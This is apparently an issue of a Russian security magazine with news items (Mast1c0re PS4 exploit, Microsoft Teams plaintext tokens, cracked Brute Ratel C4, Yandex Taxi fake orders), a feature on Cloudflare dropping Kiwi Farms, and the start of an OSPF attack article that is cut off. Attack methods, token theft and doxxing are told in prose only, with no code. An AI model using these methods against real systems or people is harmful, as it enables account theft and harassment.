CTurt подчеркивает, что закрыть дыру, которую использует Mast1c0re, практически невозможно. Дело в том, что эксплуатируемый эмулятор PS2 упакован

скаждой доступной игрой PS2-на-PS4, а не хранится отдельно, как часть операционной системы консоли.

То есть для физических дисков PS2-на-PS4 эксплоит будет работать, пока пользователь отказывается от онлайн-обновлений перед игрой. А для цифровых релизов это означает, что, даже если эксплоит исправлен, существуют

методы перейти на сохраненную версию, пригодную для эксплуатации,

сиспользованием проксированного HTTP-трафика с локального сервера.

««Проблема неисправима не с технической точки зрения, но в том смысле, что так устроена консоль и они не будут ее менять. Если у вас есть

эксплуатируемая игра (цифровая или физическая), Sony будет сложно » удалить или исправить ее на вашей консоли», — объясняет CTurt.

В похожей ситуации компания Nintendo приняла решение удалить эксплуатируемые 3DS-игры из Nintendo eShop, пытаясь ограничить возможный ущерб. Пока Sony не поступила так же с эксплуатируемыми играми для PS2 в PSN.

БЛОКИРОВЩИКИ БУДУТ БЛОКИРОВАТЬ

Разработчики браузера Vivaldi, который поставляется со встроенным блокировщиком рекламы и трекеров, заверили, что их блокировщик рекламы продолжит работать даже после вступления в силу Google Manifest V3, который определяет возможности и ограничения для расширений.

Дело в том, что уже в 2023 году должна заработать третья версия манифеста, а он все еще весьма далек от идеала и сильно ограничивает возможности блокировщиков рекламы, антивирусов, решений для родительского контроля и различных продуктов, повышающих конфиденциальность.

Команда Vivaldi уверяет, что ее блокировщик будет работать как нужно, ведь исходно он был создан именно как ответ грядущему Manifest V3. Что касается сторонних блокировщиков, точного ответа у команды Vivaldi нет, но разработчики надеются на лучшее и обещают дать пользователям выбор.

→ «Важно отметить, что расширения-блокировщики часто зависят от других API-интерфейсов, которые удалены в Manifest V3 (и, вероятно, их будет куда сложнее вернуть обратно). Поэтому нет гарантий, что простого сохранения блокирующей функции webRequest будет достаточно и не понадобится дополнительная работа со стороны мейнтейнеров этих расширений.

Поскольку Vivaldi построен на базе Chromium, то, как мы справимся с изменениями в API, зависит от того, как Google реализует свои ограничения. Можем заверить, что, какие бы ограничения ни добавляли в Google, в итоге мы постараемся их снять. Наша миссия всегда будет заключаться в том, чтобы у вас был выбор»,

— пишет в блоге компании разработчик Vivaldi Жульен Пикалауса (Julien Picalausa).

Продолжение статьи →

← Начало статьи

ПРОБКА ИЗ-ЗА АТАКИ

В начале сентября в Москве практически воплотился в жизнь сюжет из игры Watch Dogs: на Кутузовском проспекте образовалась огромная пробка, в которой стояло подозрительно много автомобилей такси. Как оказалось, неизвестные попытались нарушить работу «Яндекс Такси» и создали множество фейковых заказов в районе Фили на западе города.

Пробка начала скапливаться примерно в 11:00 утра по московскому времени и практически полностью состояла из десятков машин такси. Сами водители жаловались в социальных сетях на ложные заказы и на то, что «всех отправили в один район».

Как вскоре сообщили в пресс-службе Яндекса, затор действительно образовался не просто так: неизвестные попытались провести атаку на сервис, но служба безопасности оперативно остановила попытки искусственного скопления автомобилей.

««Утром 1 сентября „Яндекс Такси“ столкнулся с попыткой злоумышленников нарушить работу сервиса — нескольким десяткам водителям

поступили массовые заказы в район Фили. Водители провели в пробке из за фейковых заказов около 40 минут. Вопрос компенсаций будет

решен в самое ближайшее время. Сейчас автомобили такси уже разъехались из района скопления и выполняют заказы в обычном » режиме», — сообщили в Яндексе.

Также представители компании подчеркнули, что алгоритм обнаружения и предотвращения подобных атак был усовершенствован, чтобы исключить такие инциденты в будущем.

БОЛЬШЕ YOUTUBE И TELEGRAM

Аналитики Mediascope изучили, как изменилось медиапотребление российских пользователей

в 2022 году. По их данным, в среднем каждый россиянин проводит в сети 3 ч 41 мин в день и большая часть этого времени проходит в социальных сетях и за просмотром видео.

Лидерство среди социальных сетей держат «Вконтакте» и Telegram, который также попадает в эту категорию и демонстрирует значительный прирост аудитории с февраля 2022 года.

Зато продолжается заметное сокращение аудитории в запрещенных и заблокированных Facebook* и Instagram*, которыми теперь ежедневно пользуются только 0,2% и 8% населения соответственно.

Также отмечается, что в июле и августе россияне стали проводить больше времени на YouTube. С начала года показатель оставался стабильным и составлял 84 мин. В июле же среднее время просмотра видео на YouTube выросло до 87 мин, а в августе — до 88 мин.

На YouTube каждый день заходят примерно 39% российских пользователей. Охват также увеличился год к году: в августе 2022 года он составил 48 миллионов человек против 41,3 миллиона человек в августе 2021 года.

В целом среди интернет-ресурсов по охвату лидируют WhatsApp, Яндекс, Google, «Вконтакте» и YouTube.

* Принадлежат компании Meta, деятельность которой признана экстремистской, организация запрещена в России.

ТОКЕНЫ ОТКРЫТЫМ ТЕКСТОМ

Специалисты обнаружили серьезную уязвимость в десктопном приложении Microsoft Teams. Баг позволяет получить доступ к токенам аутентификации, которые, как оказалось, хранятся в формате простого текста, без какой-либо защиты.

О проблеме рассказывают исследователи из ИБ-компании Vectra. По их словам, уязвимость затрагивает десктопные версии приложения для Windows, Linux и macOS. Фактически злоумышленник с локальным доступом в системе, где установлено приложение Microsoft Teams, может похитить незащищенные токены, а затем использовать их для входа в чужую учетную запись.

««Эта атака не требует специальных разрешений или сложной малвари,

но может нанести сокрушительный урон», — объясняет эксперт Vectra » Коннор Пиплс (Connor Peoples).

Специалисты Vectra обнаружили эту проблему в августе 2022 года и немедленно сообщили о ней в Microsoft, однако разработчики компании не согласились с тем, что это серьезная проблема, заявив, что исправлению она не подлежит. Все дело в том, что для реализации атаки хакеру сначала нужно получить доступ к сети жертвы.

Корень ошибки уходит к тому факту, что Microsoft Teams — это Electron-при- ложение. То есть оно запускается в окне браузера со всеми элементами, необходимыми для обычной веб-страницы (файлы cookie, строки сеанса, журналы и так далее). По умолчанию Electron не поддерживает шифрование или защищенные расположения файлов, поэтому, хотя такая программная среда универсальна и проста в использовании, она не считается безопасной для разработки критически важных продуктов.

Аналитики Vectra исследовали Microsoft Teams в поисках способа удаления деактивированных учетных записей из клиентских приложений, но вместо этого нашли файл ldb с токенами доступа в открытом виде. Кроме того, они обнаружили, что папка Cookies содержит действительные токены аутентификации,

атакже информацию об учетной записи, данные сеанса и маркетинговые теги.

««В ходе проверки было установлено, что эти токены активны и не являются случайным дампом какой то предыдущей ошибки. Эти токены

предоставили нам доступ к API Outlook и Skype», — рассказывают » исследователи.

После этого открытия в компании создали простой эксплоит, злоупотребляющий вызовом API, что позволяет отправлять сообщения самому себе. Используя SQLite для чтения БД Cookies, исследователи добились получения токенов аутентификации через сообщения чата.

По сути, этот метод могут взять на вооружение операторы инфостилеров: токены аутентификации Microsoft Teams позволят обойти многофакторную аутентификацию и получить полный доступ к учетным записям жертв.

Так как патча, скорее всего, не будет, специалисты Vectra рекомендуют пользователям переключиться на браузерную версию Microsoft Teams. Также они советуют пользователям Linux перейти на другой продукт для совместной работы, тем более что недавно Microsoft сообщила, что планирует прекратить поддержку этой платформы к декабрю.

704,8 МИЛЛИОНА ПАКЕТОВ В СЕКУНДУ

В середине сентября компания Akamai зафиксировала мощную DDoS-атаку на одного из ее европейских клиентов. «Мусорный» трафик достиг мощности 704,8 миллиона пакетов в секунду, что примерно на 7% выше предыдущего рекора.

Прошлый рекорд был установлен в июле во время атак на неназванного клиента Akamai из Восточной Европы. Жертва подверглась целой череде DDoS-атак, которые были разбиты

на десятки «волн», а общее количество инцидентов превысило 75. Атака длилась около 14 ч

и на пиках достигала мощности в 853,7 Гбит/с и 659,6 миллиона пакетов в секунду.

Теперь же Akamai обнаружила и заблокировала 201 атаку (против летних 75), исходившую с 1813 IP-адресов (против 512 ранее).

BRUTE RATEL

ВЗЛОМАЛИ

На русскоязычных и англоязычных хакерских форумах распространяется взло-

манная версия red team инструмента Brute Ratel Command and Control Center (Brute Ratel C4 или BRc4). Если раньше создатель инструментария Читан Наяк (Chetan Nayak) уверял, что при обнаружении злоупотреблений он может идентифицировать нарушителя и отозвать лицензию, теперь это уже не получится.

В 2020 году Читан Наяк, бывший участник red team в Mandiant

иCrowdStrike, создал BRc4 в качестве альтернативы Cobalt Strike. Инструменты получились одновременно похожими и непохожими друг на друга. К примеру, Cobalt Strike позволяет развертывать «маяки» на скомпрометированных устройствах для удаленного наблюдения за сетью или выполнения команд. В свою очередь, Brute Ratel позволяет развертывать на удаленных хостах«барсуков» (badgers), которые очень похожи на маяки в Cobalt Strike. Такие «барсуки» подключаются к управляющему серверу злоумышленника, чтобы получать команды или передавать операторам результаты уже запущенных команд.

Первые злоупотребления Brute Ratel были обнаружены летом 2022 года. Так как BRc4 во многом ориентирован на уклонение от обнаружения EDR

иантивирусными решениями, почти все защитные продукты не определяют в нем вредоносное ПО. Из-за этой особенности исследователи называли Brute Ratel «уникально опасным».

Внастоящее время годовая лицензия на Brute Ratel стоит 2500 долларов США на одного пользователя, а клиенты обязаны предоставить рабочий адрес электронной почты и пройти проверку перед получением лицензии. Поскольку

проверка выполняется вручную (хотя неизвестно, как именно), летом 2022 года перед экспертами встал вопрос: как злоумышленники вообще получили лицензию?

Тогда Читан Наяк объяснял, что лицензию слил на сторону недовольный сотрудник одного из его клиентов. Разработчик заверил, что пейлоады позволяют ему видеть, кому они принадлежат, поэтому он сумел идентифицировать и оперативно отозвать лицензию.

Впрочем, уже тогда сообщалось, что злоупотребления Brute Ratel — не единичный случай. К примеру, по информации ИБ-специалистов, операторы вымогателя Conti вообще приобретали лицензии Brute Ratel, создавая для этих целей специальные подставные американские компании.

Судя по всему, теперь хакерам больше не придется прибегать к подобным ухищрениям. ИБ-эксперт Уилл Томас (Will Thomas), известный под ником BushidoToken, обнаружил, что взломанная копия Brute Ratel (версии 1.2.2) циркулирует среди злоумышленников на хакерских форумах с середины сентября.

««Теперь на популярных хак форумах, где тусуются брокеры данных, разработчики вредоносных программ, брокеры первоначальных дос-

тупов и партнеры вымогателей, есть несколько тем [посвященных Brute

Томас пишет, что в этой версии Brute Ratel вообще не нужно вводить лицензионный ключ и она не выглядит поддельной ни по его мнению, ни по мнению его коллег из компании Curated Intel. По словам эксперта, злоумышленники уже активно делятся друг с другом скриншотами, на которых видно, как они тестируют инструментарий.

Читан Наяк уже подтвердил, что ранее на VirusTotal была загружена невзломанная версия инструментария, которая затем была взломана русскоязычной хакерской группировкой Molecules для удаления проверки лицензии.

Увы, это означает, что в скором будущем больше злоумышленников начнут использовать Brute Ratel вместо Cobalt Strike или вместе с ним. При этом Уилл Томас подчеркивает, что инструментарий способен генерировать шелл-код, который в настоящее время крайне плохо обнаруживается защитными решениями.

ДРУГИЕ ИНТЕРЕСНЫЕ СОБЫТИЯ МЕСЯЦА

Японское правительство борется с использованием дискет

Chrome позволяет сайтам взаимодействовать с буфером обмена без разрешения Инди-разработчик вынудил Valve заблокировать кураторов-мошенников в Steam

Власти закрыли маркетплейс WT1SHOP, продававший банковские карты, учетные данные и документы

Патчи для проблемы Retbleed замедляют виртуальные машины на Linux на 70%

Coinbase поддержала иск против Минфина США, оспаривающий санкции против Tornado Cash

Исследователи создали устройство TickTock, способное обнаруживать прослушку Экс-глава безопасности Twitter заявил, что в компании работают шпионы из Китая и Индии

Кардеры используют фейковые сайты знакомств и поддержки клиентов, чтобы воровать деньги Российским пользователям заблокировали обновление до Windows 11 22H2

ПОЧЕМУ CLOUDFLARE ОТКАЗАЛАСЬ ЗАЩИЩАТЬ САЙТ, ГДЕ СОБИРАЮТСЯ ТРОЛЛИ И СТАЛКЕРЫ

Как ни странно, форумы Kiwi Farms работали не в даркнете и существуют почти десять лет — с 2013 года. Сайт основан несколькими людьми, среди которых — бывший администратор имиджборда 8chan Джошуа Мун (Joshua Moon), известный в сети под ником Null. Вскоре после запуска форумов бразды правления ресурсом окончательно перешли к нему, и в настоящее время Kiwi Farms управляет именно он.

Сейчас Kiwi Farms доступен в основном через Tor

До 2014 года ресурс носил название CWCki Forums, так как исходно он предназначался для травли всего одного человека — художницы, автора веб-комиксов, преследовать которую начали еще в 2007 году на 4chan. В какой-то момент тролли создали о ней статью в Encyclopedia Dramatica, но некоторые сочли, что материал недостаточно полный и точный. Так возникла специальная вики под названием CWCki, которое составили из инициалов жертвы. Позже кому-то показалось, что CWCki Forums созвучно с Kiwi Farms, и сайт переименовали.

Со временем ресурс, изначально посвященный преследованию лишь одно- го человека, разросся до огромного сообщества, которое в СМИ не раз называли главным прибежищем троллей и сталкеров всех мастей. Сами поль- зователи форумов описывали себя как «сообщество, посвященное обсуждению эксцентричных людей, которые добровольно выставляют себя дураками».

Участники Kiwi Farms годами издевались над тысячами публичных и не очень личностей и преследовали целые сообщества. Доксинг, сваттинг (от английского swatting, когда, сообщая о ложных угрозах взрыва, захвате заложников и подобном, добиваются того, чтобы к жертвам домой прислали отряд спецназа или полиции), угрозы, преследование не только в сети, но и в реальной жизни — все это обычные будни для участников Kiwi Farms. Наверное, достаточно сказать, что доведение до самоубийства считается особенно выдающимся достижением на этом сайте.

Чаще всего пользователи Kiwi Farms травили участников ЛГБТ-сообщества и нейроотличных людей (страдающих различными отклонениями). Но это не значит, что все ограничивалось только ими. Также жертвами Kiwi Farms регулярно становились журналисты, активисты, сетевые знаменитости, политические деятели и простые, почти случайные люди, каким-то образом «перешедшие дорогу» участникам форума.

До недавнего времени самыми известными жертвами Kiwi Farms считались следующие люди (их смерти вызывали в сети и СМИ заметный резонанс, однако до каких-то реальных действий против Kiwi Farms дело так и не дошло).

Разработчик SNES-эмуляторов, известный под ником Near. Покончил с собой в 2021 году, сообщив перед смертью, что устал бороться с депресси- ей, которую значительно усугубила длительная травля, устроенная пользовате-

лями Kiwi Farms.

««От нападок на меня за то, что я аутист, все переросло в преследование и доксинг моих друзей, одного из которых вынуждали покончить с собой, просто чтобы добиться от меня реакции. Из за этого я потерял

одного из своих лучших друзей и чувствую себя ответственным.

Для меня уже слишком поздно, но я молюсь, чтобы кто нибудь когда нибудь сделал что нибудь с этим сайтом. Слишком много людей

страдает, но, кажется, никому нет до этого дела, потому что в сети все мы практически никто и они знают об этом. Зло побеждает, когда » хорошие люди бездействуют», — писал Near перед смертью.

Трансгендерная разработчица игр Хлоя Сагал (Chloe Sagal), которая в 2018 году совершила акт самосожжения в Портленде, штат Орегон (позже скончалась в больнице от полученных травм). Перед этим пользователи Kiwi Farms травили Сагал несколько лет, и, по словам друзей, ее все чаще стали посещать мысли о суициде.

««Всякий раз, когда она говорила о самоубийстве, участники Kiwi Farms жаловались на ее страницу в Facebook* , и ее блокировали.

За месяц до ее смерти такое происходило несколько раз», — расска- » зывали СМИ друзья Сагал.

Также пользователи Kiwi Farms много лет пристально следили за программистом Терри Дэвисом (Terry Davis), небезызвестным создателем операционной системы с религиозными мотивами TempleOS, которую Дэвис проектировал для «общения с богом». В 2018 году его сбил поезд, и следствию так и не удалось установить, было ли это самоубийство или несчастный случай.

Дэвис был шизофреником, а с 1996 года у него наблюдались регулярные маниакальные эпизоды, но в последние годы жизни он активно пользовался соцсетями, публиковал видеоблоги и стримил, чем и заинтересовал сообщество Kiwi Farms. Люди, знавшие Дэвиса, отмечали, что постоянный троллинг и провокации явно ухудшали его состояние.

Более того, пользователями Kiwi Farms были даже известные массовые убийцы. Например, Брентон Харрисон Таррант, в 2019 году устроивший стрельбу в мечетях новозеландского Крайстчерча и убивший больше 50 человек.

Тогда полиция направила администратору Kiwi Farms Джошуа Муну требование о сотрудничестве и запросила содействие в поиске пользователей, ответственных за распространение материалов Тарранта. Мун ответил на это длинной нецензурной тирадой, суть которой сводилась к тому, что законы Новой Зеландии на него и сайт не распространяются.

Нет, даже после этого Kiwi Farms не закрыли. Просто запретили в Новой Зеландии.

КЛАРА СОРРЕНТИ

К нынешнему краху Kiwi Farms привела масштабная кампания Drop Kiwi Farms, которую запустила в сети еще одна жертва этих форумов — Клара Сорренти (Clara Sorrenti), в онлайне известная как Ke als. Сорренти — трансгендерная активистка и Twitch-стример, то есть одна из самых лакомых для сообщества

Kiwi Farms целей.

Все началось 5 августа, когда в дом Сорренти в канадском Лондоне ворвалась полиция и ее саму в итоге арестовали. Дело в том, что накануне неизвестные отправили членам городского совета письма, в которых утверждалось, будто Сорренти владеет нелегальным огнестрельным оружием, уже убила свою мать и теперь собирается пойти в городскую администрацию, чтобы «расстрелять каждого цисгендера», которого встретит по пути.

««Когда меня разбудили полицейские и я увидела направленный мне в лицо автомат, я подумала, что сейчас умру», — позже рассказала » Сорренти на YouTube.

Сорренти рассказывает о сваттинге и аресте

При этом сваттинг был уже не первым выпадом в адрес Сорренти. По ее словам, первое, что сделали участники форумов, когда завели тред с ее именем на Kiwi Farms, — это отыскали в сети некролог ее покойного отца и использовали, чтобы найти посвященную ему страницу в Facebook* . Там обнаружились совместные фото, снятые на крыльце дома Сорренти, и по ним участники форума вычислили, где Сорренти живет.

За этим последовали долгие месяцы оскорблений, угроз и доксинга. Сайт кампании Drop Kiwi Farms гласит, что на Kiwi Farms публиковалась «личная информация Клары Сорренти, включая фото и видео сексуального характера, номера телефонов, адреса, а также личные данные друзей и семьи».

После сваттинга Сорренти начала всерьез опасаться за свою безопасность и переехала жить в отель, но ее быстро нашли и там. Дело в том, что она выложила в сеть фото своего кота, — и участники Kiwi Farms проштудировали сайты для бронирования всех местных отелей, сравнили постельное белье на фотографии и вычислили, где остановилась Сорренти. Ей дали понять, что уже знают о ее новом местонахождении, заказав в ее номер пиццу.

После учетную запись Сорренти в UberEats взломали и на нее посыпались заказы на сотни долларов, а неизвестные люди начали отправлять голосовые сообщения с угрозами ей и членам ее семьи.

Тогда Сорренти вообще решила покинуть Канаду и уехала к друзьям в Северную Ирландию. Однако члены Kiwi Farms снова ее выследили. Вскоре один из пользователей разместил в сети фотографию, сделанную напротив дома, где поселилась Сорренти. К фото прилагалось написанное от руки сообщение с упоминанием Kiwi Farms.

Вскоре после этого Сорренти собралась пообедать с друзьями в ресторане и неизвестные стали сообщать о якобы заложенных бомбах во всех окрестных заведениях общепита.

В схожих обстоятельствах некоторые из прошлых жертв Kiwi Farms накладывали на себя руки, и Сорренти тоже рассказывает, что начала задумываться о самоубийстве. Однако в конце августа, когда ее нашли даже в Северной Ирландии, активистка решила, что «устала убегать», и поняла, что нужно попытаться дать отпор.

Так в сети стартовала кампания Drop Kiwi Farms, в ходе которой Сорренти, довольно известная в сети личность, привлекла внимание крупнейших мировых СМИ, политиков и активистов к проблеме Kiwi Farms. О произошедшем писали в Time, Vice и множестве других изданий.

Чего добивалась Сорренти? Огласки и «бана» для Kiwi Farms. Чтобы крупные компании, подобные Cloud are, перестали закрывать глаза на происходящее и оказывать сайту косвенную помощь и поддержку. Ведь правила той же Cloud are запрещают «контент, который раскрывает конфиденциальную личную информацию, подстрекает к насилию, эксплуатирует его или предназначен для введения в заблуждение общественности».

CLOUDFLARE ПОД ДАВЛЕНИЕМ

Кампания Drop Kiwi Farms быстро набрала обороты, вышла в тренды социальных сетей, привлекла внимание активистов и СМИ, и в итоге массовой критике подверглась именно компания Cloud are, давно оказывавшая сайту защитные услуги. Фактически Cloud are прикрывала сайт от DDoS-атак, а также поддерживала его инфраструктуру.

Как объясняет в своем Twitter бывший глава по информационной безопасности в Facebook*, профессор Стэнфордского университета Алекс Стамос

(Alex Stamos), Cloud are — это не просто защита от DDoS.

««Cloudflare уделяет особое внимание защите от DDoS-атак, и они, безусловно, занимаются этим, но еще одна огромная ценность, которую

они предоставляют KF и другим сайтам, — это скорость. А для успеха любого интернет сервиса скорость является ключевым фактором. Вот почему Google и FacebookFacebook* тратят миллиарды на это преимущество.

Cloudflare — это не просто щит, стоящий перед KF и останавливающий атаки. Cloudflare обращается к исходному хосту KF, скорее всего пуленепробиваемому хостингу в зоне RU (здесь Стамос ошибается,

и из рунета Kiwi Farms выгнали очень быстро. — Примеч. ред.), и делает тысячи копий сайта, которые затем хранит физически (в оперативной » памяти) очень близко к конечным пользователям», — пишет Стамос.

Кстати, в Cloud are заявляли, что вовсе не размещали контент Kiwi Farms, а значит, сайт не подпадал под правила, запрещающие «контент, который раскрывает конфиденциальную личную информацию, подстрекает к насилию, эксплуатирует его или предназначен для введения в заблуждение общественности».

Глава Cloud are Мэтью Принс

В конце августа Cloud are была вынуждена как-то отреагировать на происходящее. Глава Cloud are Мэтью Принс (Matthew Prince) опубликовал в официальном блоге заявление, в котором попытался объяснить, как в Cloud are относятся к различным злоупотреблениям.

В этом сообщении Принс сравнивает компанию Cloud are с пожарными, которые не отказываются тушить дома, если в них проживают люди, обладающие сомнительными моральными качествами.

««Некоторые утверждают, что мы должны отключать такие сервисы (как Kiwi Farms) из за контента, который мы считаем предосудительным, что-

бы другие могли атаковать их и вывести из строя. В физическом мире это эквивалентно аргументу, что пожарная служба не должна реагировать на пожары в домах людей, если те не обладают определенными моральными качествами. Как в физическом мире, так и в интернете

это опасный прецедент, который в долгосрочной перспективе может нанести непропорциональный ущерб уязвимым и маргинализированным » сообществам», — писал Принс.

Также он напомнил, что в истории было всего два прецедента, когда Cloud are отказывалась предоставлять свои услуги сайтам.

Первый случай имел место в 2017 году — это закрытие неонацистского сайта The Daily Stormer, с пользователем которого связывали теракт в Шарлотсвилле, штат Вирджиния (тогда Джеймс Алекс Филдс протаранил на автомобиле толпу людей, в результате чего пострадали 19 человек). Второй случай — блокировка имиджборда 8chan, произошедшая в 2019 году после массового убийства в городе Эль-Пасо, штата Техас, когда погибли 20 человек. Свой манифест нападавший, Патрик Крузиус, опубликовал именно на этом имиджборде.

Нужно подчеркнуть, что в обоих случаях Cloud are не действовала самостоятельно, на опережение, а дожидалась решений суда и лишь после этого прекращала работать с сайтами.

При этом Принс заявляет, что после обеих блокировок «в компании заметили резкое увеличение числа авторитарных режимов, пытающихся вынудить Cloud are отключить защитные сервисы для сайтов правозащитных организаций, при этом ссылаясь на наши собственные аргументы».

не вызывало отвращения (оно вызывало), а потому, что защитные сервисы больше всего напоминают интернет утилиты, — объясняет Принс — Точно так же телефонная компания не отключает ваш телефон, если вы говорите ужасные, расистские и фанатичные вещи. Проконсультировавшись с политиками, высокими должностными лицами и экспертами, мы считаем, что не должны отключать защитные сервисы, если то, что вы публикуете, является отвратительным и неправильным, это ошибочная политика.

Для ясности: если мы поступили так в ограниченном количестве слу- чаев, это не значит, что мы были правы, когда это сделали. И не значит, » что мы когда нибудь сделаем это снова».

Однако все попытки Cloud are объясниться и оправдать свои действия привели только к усилению давления, а шквал критики продолжил нарастать. Заявление Принса широко обсуждали в сети, и о морально-этическую сторону вопроса было сломано немало копей. Ведь ответ на вопрос «кто заслуживает защиты от DDoS-атак?» оказался гораздо сложнее, чем кажется на первый взгляд.

В частности, уже упомянутый Алекс Стамос писал, что Принс немного лукавит, когда рекомендует обращаться к хостерам и давить на них, если речь заходит о модерации и потенциальных блокировках контента.

««Еще одно преимущество, которое Cloudflare предоставляет KF, — это анонимность исходного хоста, поэтому, хотя в блоге они говорят

о хостинге как о подходящем месте для обеспечения более агрессив-

ной модерации контента, на практике Cloudflare делает эффективным хостинг у провайдеров, которые не отвечают на запросы», — объяснял » эксперт.

Забавно, но действия компании осудил даже бывший оператор сервисов для DDoS-атак по найму под ником Rasbora. В своем посте он иронизирует на тему того, что в подростковом возрасте управлял десятками сервисов для DDoS, каждый из которых защищался от конкурентов с помощью тех самых «нейтральных утилит» Cloud are, о которых писал Принс.

««Без „нейтральных“ защитных сервисов Cloudflare я не смог бы организовать миллионы DDoS-атак. Трудно передать, насколько важную роль

инструменты Cloudflare играют в успешной работе DDoS-сервисов: преступники, у которых не было защиты Cloudflare, не задерживались » в онлайне подолгу», — говорит Rasbora.

Бывший дидосер пишет, что компания прекрасно знает, кому предоставляет защиту, и продолжает делать это, «полностью осознавая конечный результат своих действий».

БЛОКИРОВКА KIWI FARMS

Когда стало очевидно, что официальное заявление Мэтью Принса, говорившего от лица Cloud are, только увеличило недовольство в сети, компании все же пришлось пойти на более решительные меры.

Заявление о блокировке Kiwi Farms

4 сентября 2022 года в блоге Cloud are появилось новое сообщение, гласившее, что поставщик перестает оказывать услуги Kiwi Farms и больше не будет защищать ресурс. Этот шаг Принс объяснил тем, что обстановка продолжала накаляться и эскалация происходящего стала напрямую угрожать жизням людей.

««Это экстраординарное для нас решение, и, учитывая роль Cloudflare как поставщика интернет инфраструктуры, опасное решение, которое

нам не нравится. Тем не менее в последние 48 часов риторика на сай-

Глава Cloud are сетует, что правоохранительные органы, к сожалению, работают не слишком быстро и эскалация рисков происходит гораздо быстрее.

««Хотя мы считаем, что подобно другим ситуациям, с которыми мы сталкивались (включая случаи Daily Stormer и 8chan), нам, как поставщику

В своих заявлениях руководство Cloud are подчеркивает, что это сложное решение может лишь ухудшить положение, ведь теперь пользователи Kiwi Farms почувствуют себя еще более изолированными и атакованными и станут лишь агрессивнее. По словам Принса, «блокировка Kiwi Farms временно сглаживает конфликт, но она никоим образом не решает основную проблему», для устранения которой в обществе должна быть проделана огромная работа.

Также Принс высказывает мысль, что Kiwi Farms, скорее всего, оперативно найдет другую инфраструктуру и все равно вернется в онлайн.

С этим мнением явно несогласна Клара Сорренти, которая 5 сентября разместила на сайте кампании Drop Kiwi Farms сообщение, начинающееся со слов: «Кампания окончена. Мы победили».

Сорренти пишет, что после бана операторы Kiwi Farms действительно попытались укрыться в рунете (о чем писал Алекс Стамос), однако не задержались в нем надолго, равно как и в других местах. Дело в том, что российская компания DDoS-Guard, специализирующаяся на защите от DDoS-атак, также отказалась работать с Kiwi Farms.

««Мы предоставляем услуги тем, кто в них нуждается, если сайт клиента не преступил черту закона и если не пришло официальное уведом-

ление от уполномоченных органов о запрете на поддержку ресурса. Сегодня DDoS-Guard прекратил предоставление услуг для форума Kiwi Farms, не дожидаясь официального уведомления. В течение многих лет

мы придерживаемся политики сетевого нейтралитета. Однако есть вещи, которые для нас неприемлемы при любых обстоятельствах», — » сообщили в пресс службе DDoS-Guard 5 сентября.

После блокировки основным каналом связи Муна с пользователями стал Telegram. Когда DDoS-Guard отказался сотрудничать с Kiwi Farms, Мун писал: «Сегодня утром DDoS-Guard отказался от нас. Этот мем о том, что Россия — свободная страна, просто смешон».

««Я не вижу ситуации, в которой Kiwi Farms просто позволят работать. [Сайт] либо превратится в раздробленную оболочку самого себя,

как 8chan, либо будет прыгать между хостами и доменными именами, » как Daily Stormer», — признавал Мун в начале сентября.

В настоящее время Kiwi Farms доступен преимущественно через Tor, но onionсайт работает с перебоями, а найти другие варианты, где ресурс не банят через несколько дней, пока не выходит. Также нужно сказать, что Kiwi Farms исключили даже из интернет-архива Wayback Machine.

Сейчас сайт регулярно подвергается DDoS-атакам, а согласно свежему сообщению Муна от 18 сентября, на днях Kiwi Farms успешно взломали: был скомпрометирован украинский хостер vsys, которым Kiwi Farms пользовался как прямым прокси, и в результате учетная запись администратора. Мун предупреждает, что, скорее всего, в ходе атаки были украдены пароли, emailадреса и IP-адреса всех пользователей ресурса. Тем не менее админ обещает, что работа сайта будет восстановлена.

Сообщение о взломе

Мун объясняет, как взломали сайт

Что касается Cloud are, в компании по-прежнему убеждены, что принятое решение было вынужденным и скверным, а его последствия могут быть даже хуже.

««Я думаю, люди неправильно поняли наше комплексное мнение по данному вопросу. По сути, ситуация заключалась в том, что нас, как пос-

тавщика услуг безопасности, попросили отойти в сторону, чтобы сайт мог подвергнуться кибератаке. Для нас это давний вопрос — сама идея того, чтобы решить проблему проблемного контента, отступив в сто-

рону и позволив провести атаку, которая, вероятно, сама по себе явля-

ется незаконной», — комментирует вице президент Cloudflare Алисса » Старзак (Alissa Starzak).

Клара Сорренти, уже провозгласившая победу над Kiwi Farms, отмечает, что недавно даже помощник директора ФБР официально признал, что Kiwi Farms представляет собой «внутреннюю террористическую угрозу». Она обещает, что ее команда продолжит следить за Kiwi Farms, но вряд ли ресурс сможет возродиться и получит такую же доступность и влияние в интернете, какими обладал еще недавно.

««Бесчисленные жертвы Kiwi Farms могут спать спокойно, зная, что сайт обречен. Он никогда не восстановит былую динамику и продолжит терять подписчиков, с каждой неделей становясь все более и более » неактуальным. <…> Сегодня мир стал лучше», — заключает Сорренти.

Принадлежит компании Meta, которая признана экстремистской и запрещена

в России.

EVIL TWIN ПОВЕРХ ДИНАМИЧЕСКОЙ МАРШРУТИЗАЦИИ

Статья имеет ознакомительный характер и предназначена для специалистов по безопасности, проводящих тестирование в рамках контракта. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.

КАК РАБОТАЕТ OSPF

OSPF (open shortest path rst) — это протокол внутридоменной динамической маршрутизации, основанный на математическом алгоритме Эдсгера Дейкстры. Это link-state-протокол, и во время передачи данных по OSPF анализируется состояние канала. На основе состояния канала OSPF структурирует таблицы маршрутизации, поддерживает их актуальность и выполняет автоматический обмен маршрутной информацией со своими соседями. OSPF — открытый стандарт, который поддерживают все вендоры сетевого оборудования. И это самый распространенный протокол внутридоменной маршрутизации

врамках продакшена.

Вэтой статье я буду говорить о второй версии OSPF. Характеристики ее таковы:

•OSPF для трансляции служебной информации использует IP-адрес групповой рассылки 224.0.0.5;

•поддерживает IPv4;

•работает исключительно на сетевом уровне;

•в качестве объявлений состояния каналов использует сообщения LSA (linkstate advertisement);

•поддерживает VLSM;

•имеет высокий коэффициент уровня сходимости по сравнению с дистанци- онно-векторными протоколами;

•строит дерево кратчайших путей (так как основан на алгоритме Дейкстры);

• использует формулу reference bandwidth / link bandwidth

для оценки стоимости маршрута. То есть константа полосы пропускания делится на фактическую скорость полосы пропускания. Однако значение reference bandwdith может быть изменено.

Установление соседства в OSPF

Что может помешать атакующему?

Протокол OSPF атаковать куда сложнее, чем его родственников — дистанци- онно-векторные протоколы маршрутизации (например, RIP или EIGRP). Обозначу основные проблемы:

•AS OSPF может быть разбита на зоны. Инженеры могут спроекти-

